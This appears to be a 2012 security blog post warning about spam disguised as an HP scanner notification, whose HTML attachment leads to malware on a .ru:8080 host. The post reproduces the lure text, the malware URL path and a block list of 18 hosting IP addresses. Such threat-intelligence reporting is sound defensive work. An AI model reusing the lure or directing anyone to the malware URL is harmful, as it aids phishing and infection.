Another malicious spam, this time with an attachment containing obfuscated code leading to caskjfhlkaspsfg.ru.
Date: Thu, 1 Mar 2012 09:43:50 +0530
From: [email protected]
Subject: Fwd: Re: Fwd: Scan from a Hewlett-Packard Officejet #603320
Attachments: HP_Scan-27-499614.htmAttached document was scanned and sent
to you using a Hewlett-Packard HP SmartJet 4931F.
Sent by: ARLYNE
Pages : 9
Attachment Type: .HTM [Internet Explorer/Mozilla Firefox]
The malware is on caskjfhlkaspsfg.ru:8080/images/aublbzdni.php , as with other recent .ru:8080 attacks, this is multihomed on a familiar set of IP addresses:
50.31.1.105 (Steadfast Networks, US)
69.60.117.183 (Colopronto, US)
78.107.82.98 (Corbina Telecom, Russia)
83.238.208.55 (Netia Telekom, Poland)
95.156.232.102 (Optimate-server, Germany)
96.125.168.172 (Websitewelcome, US)
111.93.161.226 (Tata Teleservices, India)
125.19.103.198 (Bharti Infotel, India)
128.134.57.112 (Kwangun University, Korea)
173.203.51.174 (Slicehost, US)
184.106.200.65 (Slicehost, US)
184.106.237.210 (Slicehost, US)
190.81.107.70 (Telemax, Peru)
199.204.23.216 (ECSuite, US)
200.169.13.84 (Century Telecom Ltda, Brazil)
209.114.47.158 (Slicehost, US)
210.56.23.100 (Commission For Science And Technology, Pakistan)
210.109.108.210 (Sejong Telecom, Korea)
A bare list for copy-and-pasting:
50.31.1.105
69.60.117.183
78.107.82.98
83.238.208.55
95.156.232.102
96.125.168.172
111.93.161.226
125.19.103.198
128.134.57.112
173.203.51.174
184.106.200.65
184.106.237.210
190.81.107.70
199.204.23.216
200.169.13.84
209.114.47.158
210.56.23.100
210.109.108.210
Leave a reply
